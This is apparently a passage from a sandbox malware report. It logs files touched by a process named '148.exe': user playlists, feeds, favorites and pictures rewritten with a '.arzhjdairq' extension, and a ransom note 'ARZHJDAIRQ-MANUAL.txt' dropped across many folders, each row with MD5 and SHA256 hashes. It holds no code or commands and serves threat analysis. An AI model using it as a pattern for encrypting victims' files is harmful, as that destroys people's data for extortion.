3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\12_All_Video.wpl.arzhjdairq
binary
MD5: 600085669bb0d97203310a9406566a5d
SHA256: cf31b74d54eec78c2bdc3599973d34e830fad9c7e8c6e75e84e2b6628d130748
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\12_All_Video.wpl
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\11_All_Pictures.wpl
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\10_All_Music.wpl.arzhjdairq
binary
MD5: 8d7331e053b2722673bdd2fcf3b9fc65
SHA256: 42d339e2a3b86994a0867d60c376e6745edec55fe3cc92ac698ff476b23e18f7
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\09_Music_played_the_most.wpl.arzhjdairq
binary
MD5: 929da92d26b5dee547570ba8b06ca658
SHA256: 1817ce77a768a28209e738f22a82fae67f5982b5f097680e64dad8b5b0006544
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\09_Music_played_the_most.wpl
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\10_All_Music.wpl
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\07_TV_recorded_in_the_last_week.wpl.arzhjdairq
binary
MD5: 66de182f8323a5989bf84c09711ea789
SHA256: 259e21874e4b6276ecc09e7fbf5a43e2b269898c02a1e76f0a324cbd84dd8b37
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\08_Video_rated_at_4_or_5_stars.wpl.arzhjdairq
binary
MD5: 8a9cc4d1d74f8b2e64ea37014af9cbb0
SHA256: d65639241ba42c782059990b38bebb93f733b667777feb4bd95e5bd0b3e32567
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\06_Pictures_rated_4_or_5_stars.wpl.arzhjdairq
binary
MD5: e087076e0e60a6839256f7b849834bc2
SHA256: 6f80f3f48091e6db3c346f173fb826031255ed4053f749730ef99811e5d1145b
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\07_TV_recorded_in_the_last_week.wpl
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\06_Pictures_rated_4_or_5_stars.wpl
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\08_Video_rated_at_4_or_5_stars.wpl
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\03_Music_rated_at_4_or_5_stars.wpl.arzhjdairq
binary
MD5: faa04f5d8632cd681549af7a478e8495
SHA256: b950083b0862bbfe0f6490cbf3cdde11fe7072d903555382cb4c7536f4e2dbf8
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\05_Pictures_taken_in_the_last_month.wpl.arzhjdairq
binary
MD5: c6f72e61dae9f602fa9a941afcb5e30d
SHA256: 90a1bc105bc2b679c7f0d751dd6ee8a9a335d13e55ad829588a161924e053b98
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\04_Music_played_in_the_last_month.wpl.arzhjdairq
binary
MD5: f6359a27e5e68cf64fce41da8a8fefad
SHA256: 34d4b487eba88b50b49e7c740e2c71997aca69188664b6b61e7fabc13d36b588
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\04_Music_played_in_the_last_month.wpl
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\05_Pictures_taken_in_the_last_month.wpl
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\03_Music_rated_at_4_or_5_stars.wpl
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\01_Music_auto_rated_at_5_stars.wpl.arzhjdairq
binary
MD5: e4db1496c97bbd7f51b1ebcad3a49afc
SHA256: 6fc7e3573be1f91d575b2b709f263c03943ade9eb3bd745d18b5aa57d43e19bf
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\02_Music_added_in_the_last_month.wpl.arzhjdairq
binary
MD5: 91b76d7a4a66656984bb31c61b658fcd
SHA256: 1c78ecf371092392f4d25ff98caffa39aa8e98ed905f1473e8c3f166f2ec884e
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\02_Music_added_in_the_last_month.wpl
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\01_Music_auto_rated_at_5_stars.wpl
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\CurrentDatabase_372.wmdb.arzhjdairq
binary
MD5: 500f002c5736282f4ba2faf6017a0ea6
SHA256: ce201460a5cd414fc2186ef434ddbacf1303c68b6d322e1c512fc3dfde8f6ce5
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\LocalMLS_3.wmdb.arzhjdairq
binary
MD5: 57eeb14ddd993a8e174be81a9e7ca5ec
SHA256: 164d9b30d6112946d3eb13d5d9786e96184f4724163c0f5cb9825427b5cac0d5
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\LocalMLS_3.wmdb
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\CurrentDatabase_372.wmdb
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds Cache\index.dat.arzhjdairq
binary
MD5: ec6b57db446755e58f3b88bfa99c1ef6
SHA256: aa3ef10e6cf7f6f46fb766961d23f155bee25c3b750de42457495e38351e05ed
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Internet Explorer\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds Cache\VM3JD5NM\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Internet Explorer\brndlog.txt.arzhjdairq
binary
MD5: 17df997fd4cc8c21f834d7b6575cb14d
SHA256: 02eec9633a6b731ddd12d2d72ebc64163168a63431ad5326ca78e52570e51074
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds Cache\index.dat
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Internet Explorer\brndlog.txt
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds Cache\G4PHTCUR\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds Cache\HPSK10OB\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\Web Slice Gallery~.feed-ms.arzhjdairq
binary
MD5: db1486dbefd3446ad8201cba01cda53f
SHA256: 2b449d86373ac4825648a87f4a0eb8cb94ec58f8e0cd38b0e3cbc3ae9a84801c
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds Cache\9RI45C46\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds Cache\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\Web Slice Gallery~.feed-ms
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Work~.feed-ms.arzhjdairq
binary
MD5: cd5245f0562a37fb55aa77c88e605370
SHA256: a317829bbdc69ee114f768b7e5450fbc60d6f2c3eb80040044f5f5372ff56815
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\MSNBC News~.feed-ms.arzhjdairq
binary
MD5: 6fc6c0a4bc83c179c251f9b4d556fae5
SHA256: 0e9f515e9274e1315cba845927509aa1280167e0368e845efa2128c5e586647a
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Work~.feed-ms
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\MSNBC News~.feed-ms
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Home~.feed-ms.arzhjdairq
binary
MD5: 29c5a28c7c8e3a5e0acdc075572fb060
SHA256: 316100cd689121588a653e37be0d5f0c4956d555ab0d9d7193a054288255cb19
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Home~.feed-ms
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Feeds for United States~\USA~dgov Updates~c News and Features~.feed-ms.arzhjdairq
binary
MD5: 0ce82c57e5dc44f227ce108ef1f1cef3
SHA256: 36a9b806cba5022ba95bc997ffe8345193d88069e590202f2dc85a275b09658c
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\FeedsStore.feedsdb-ms.arzhjdairq
binary
MD5: 2b96bc7300db1756c13b6ca59881786c
SHA256: 4b7a790fb25c6a2168945a4bc10e709c166ffbd69028aefde10e6d8bf95ad94e
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\FeedsStore.feedsdb-ms
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Feeds for United States~\Popular Government Questions from USA~dgov~.feed-ms.arzhjdairq
binary
MD5: 3bd6248ee16dedb8894855917343249b
SHA256: 93c3623b47e0f774fba8bc321c5e5349f63881621d6d82472257472c568196b1
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Feeds for United States~\USA~dgov Updates~c News and Features~.feed-ms
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Feeds for United States~\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Feeds for United States~\Popular Government Questions from USA~dgov~.feed-ms
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Credentials\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows\History\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\SendTo\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Templates\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\admin\Searches\Microsoft OneNote.searchconnector-ms.arzhjdairq
binary
MD5: 3de85ddabcba6838665d8fe7da856df7
SHA256: ff3a46c2de2a5abfab241fc37c53d1ee2a504b937ffae6260dcbfaef675d11f9
3332
148.exe
C:\Users\admin\Searches\Microsoft Outlook.searchconnector-ms.arzhjdairq
binary
MD5: 0c4f1250215f38a5d15853d774bd7c49
SHA256: 7cd58f59607c620cefc9cbc24f0423cc534fa8f189ced49021b7d1ace1e83d6d
3332
148.exe
C:\Users\admin\Searches\Microsoft Outlook.searchconnector-ms
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\admin\Searches\Microsoft OneNote.searchconnector-ms
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\admin\Searches\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\admin\Saved Games\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\admin\Pictures\searchmodel.png.arzhjdairq
binary
MD5: 43161721b017b678f0304ea17df65d7b
SHA256: 818326d4575d0b1bd00023ab655aca153503074d9f2306d3df3e9ea1b2a8183d
3332
148.exe
C:\Users\admin\Pictures\weightincome.png.arzhjdairq
binary
MD5: 726a76ec03e0bbb392bc3a46c6cc7325
SHA256: e74ab93b917923c72989b715f9bfe9674268d16f39c2ca7e1e92d4b6c6e8d9e0
3332
148.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\admin\Pictures\primaryus.png.arzhjdairq
binary
MD5: 3444d8df1ee83f389443a5ea168000cf
SHA256: 83659fb17775bc297a9d76a5871e0d39e64c27c3e7d880e3465810d00f07f9c7
3332
148.exe
C:\Users\admin\Pictures\weightincome.png
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\admin\Pictures\primaryus.png
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\admin\Pictures\searchmodel.png
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\admin\Pictures\plansafrica.jpg.arzhjdairq
binary
MD5: fc91e59250abd81b759203ff9a9b2972
SHA256: 14742b1aec8f1cc96bf787693a5657ca2275bed6c8cb4eacb0692f818bcc25d0
3332
148.exe
C:\Users\admin\Pictures\ipdescribed.png.arzhjdairq
binary
MD5: 8d59782a25d088a4c9b5ba427c13590a
SHA256: b16690d16e15b92dc0c5eb62e44531acdb734d19005c51a8922e73f335718acd
3332
148.exe
C:\Users\admin\ntuser.ini.arzhjdairq
binary
MD5: c510d3158e53a962ea39d9bb04a08ac3
SHA256: 668ed036561b745f5f267ec4745c8da75764c84c1cd904eafa98b3e99e9d1719
3332
148.exe
C:\Users\admin\Pictures\plansafrica.jpg
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\admin\Pictures\ipdescribed.png
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\admin\ntuser.ini
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Spaces.url.arzhjdairq
binary
MD5: 62c68e2c2c613b5c39550ebc702c14fb
SHA256: bdc8ef109f86f9e880bfb7d12670aaf112157e0c68e08640a8bad1a59ee96567
3332
148.exe
C:\Users\admin\Links\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Spaces.url
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Gallery.url.arzhjdairq
binary
MD5: 8403bf93c0c4f84dcdf51f4740940b5a
SHA256: adea8ae7d6450948a201f3e83cd7459c9440e7b8206792c0e96d4e9b70db3cf7
3332
148.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Mail.url.arzhjdairq
binary
MD5: c38510368b03363c72bd50ec2f3536fd
SHA256: 620b3d119c013979b3c7ead2a4ed4f871afd116cd0a625f6e57c13e82142ca45
3332
148.exe
C:\Users\admin\Favorites\Windows Live\Get Windows Live.url.arzhjdairq
binary
MD5: 33232b69e462e2960cd08767f602e482
SHA256: 73595a465dfbd36bbd5dd5c73a20dd4f239d9d15e53de217b1a3036aa064acfd
3332
148.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Mail.url
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Gallery.url
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\admin\Favorites\Windows Live\Get Windows Live.url
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\admin\Favorites\MSN Websites\MSNBC News.url.arzhjdairq
binary
MD5: 4a077ef8633aacf4a07b676427acc8a0
SHA256: c25d52114d4fde65204fd12140ca0c51dc37577f2c7464b61a239c4483ff80a5
3332
148.exe
C:\Users\admin\Favorites\MSN Websites\MSN.url.arzhjdairq
binary
MD5: d23a8d698364f777da0c2d130f9409af
SHA256: 194b54c4b1e32b24ce21164339b5791433bac633766e308fe5930bdbe0a2d05a
3332
148.exe
C:\Users\admin\Favorites\Windows Live\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\admin\Favorites\MSN Websites\MSN.url
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\admin\Favorites\MSN Websites\MSNBC News.url
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\admin\Favorites\MSN Websites\MSN Entertainment.url.arzhjdairq
binary
MD5: d35265d829e7a9363d36992315f7e545
SHA256: c8f1ec6754c0df2562fa5711c5060b2a4628c1c51fe0b2cf678c3664980abf73
3332
148.exe
C:\Users\admin\Favorites\MSN Websites\MSN Sports.url.arzhjdairq
binary
MD5: 253782628c171ea6fa1043be9127f949
SHA256: 8c6a6bc4515e49c4655e23c57822aff94f0448156e03371b5b0abdcc0cd16ad0
3332
148.exe
C:\Users\admin\Favorites\MSN Websites\MSN Money.url.arzhjdairq
binary
MD5: e7c40d9503d3773e6a84d8bc20d429cc
SHA256: 2b9271101315df04212b05055b718d81a42c7e56d009d2ed84ae0f8dc916598e
3332
148.exe
C:\Users\admin\Favorites\MSN Websites\MSN Sports.url
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\admin\Favorites\MSN Websites\MSN Money.url
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\admin\Favorites\MSN Websites\MSN Entertainment.url
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\admin\Favorites\MSN Websites\MSN Autos.url.arzhjdairq
binary
MD5: e4bdb468e52cb387d67a3cd13dc90406
SHA256: e135237b556d2956a2064ab4c9421f994ef441ec481c3c571302fc31b4483cfb
3332
148.exe
C:\Users\admin\Favorites\MSN Websites\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft Store.url.arzhjdairq
binary
MD5: 7003196fca2b58b738fa0af08999e4be
SHA256: 769ce946c4c986575899c8436aea41fa448a5476a6281752fde2706ef3563790
3332
148.exe
C:\Users\admin\Favorites\MSN Websites\MSN Autos.url
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft Store.url
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Home.url.arzhjdairq
binary
MD5: 3940d7e0e6ecef779639dcc8c4903ed2
SHA256: 423333089777b341d9c85aed52d875cd82dcc1e4186695a57aed3f43d21b68c3
3332
148.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Work.url.arzhjdairq
binary
MD5: 67a78d3418b2215e13a12bf86cc85297
SHA256: a9c826cce48f7c7b39a1ac606c5937fe827f306b268c5de2fb2ac4de3906c940
3332
148.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Work.url
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Home.url
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\admin\Favorites\Links for United States\USA.gov.url.arzhjdairq
binary
MD5: 4a7a97f5a94edd3acf09cd6c742c8beb
SHA256: f76cfd919e878f99ab5836f7d7552b4335504d63be951be05632db2675b51b04
3332
148.exe
C:\Users\admin\Favorites\Microsoft Websites\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\admin\Favorites\Microsoft Websites\IE site on Microsoft.com.url.arzhjdairq
binary
MD5: 0780046bd9d43cdd94dc8e27db9055b5
SHA256: 1ca8dbd10fbd7653a169416c2da110742f12d100efd326153c19fbb3d61335d9
3332
148.exe
C:\Users\admin\Favorites\Microsoft Websites\IE Add-on site.url.arzhjdairq
binary
MD5: decacf486ea929862e5f00ac6230da27
SHA256: eb00d9a0d2f26b25a2c14810ed2d3fad96ab75e3358f707707741a9ef938f88e
3332
148.exe
C:\Users\admin\Favorites\Links for United States\USA.gov.url
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\admin\Favorites\Microsoft Websites\IE Add-on site.url
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\admin\Favorites\Microsoft Websites\IE site on Microsoft.com.url
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\admin\Favorites\Links\Web Slice Gallery.url.arzhjdairq
binary
MD5: 757761a473e39e60bd3516c52119d16c
SHA256: a3b9df47952b61470b7c5e6191ff9ea68e2da7f7981b623bbc0e1ab5782088ff
3332
148.exe
C:\Users\admin\Favorites\Links for United States\GobiernoUSA.gov.url.arzhjdairq
binary
MD5: 3b3444ccf0d02a247d98d0fe82c0cc3c
SHA256: 107477d5355bed5163eec7479711594427794505f021500039815592dc2981f1
3332
148.exe
C:\Users\admin\Favorites\Links\Suggested Sites.url.arzhjdairq
binary
MD5: 009f0b492b93196ec93fdc41222da4d6
SHA256: b3be84fe35eec5e95353b2e9654935eb0d3a1d175a7f888c5048c34ec65bee02
3332
148.exe
C:\Users\admin\Favorites\Links for United States\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\admin\Favorites\Links\Web Slice Gallery.url
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\admin\Favorites\Links\Suggested Sites.url
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\admin\Favorites\Links for United States\GobiernoUSA.gov.url
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\admin\Downloads\postsdictionary.png.arzhjdairq
binary
MD5: e665cd08bd1a1cbe0afc9d811a7e45be
SHA256: e1f2841833de8897b6793bf8afbec9258ce268ab3e43e7fd4697f9bf2bf7d735
3332
148.exe
C:\Users\admin\Downloads\phaselearning.jpg.arzhjdairq
binary
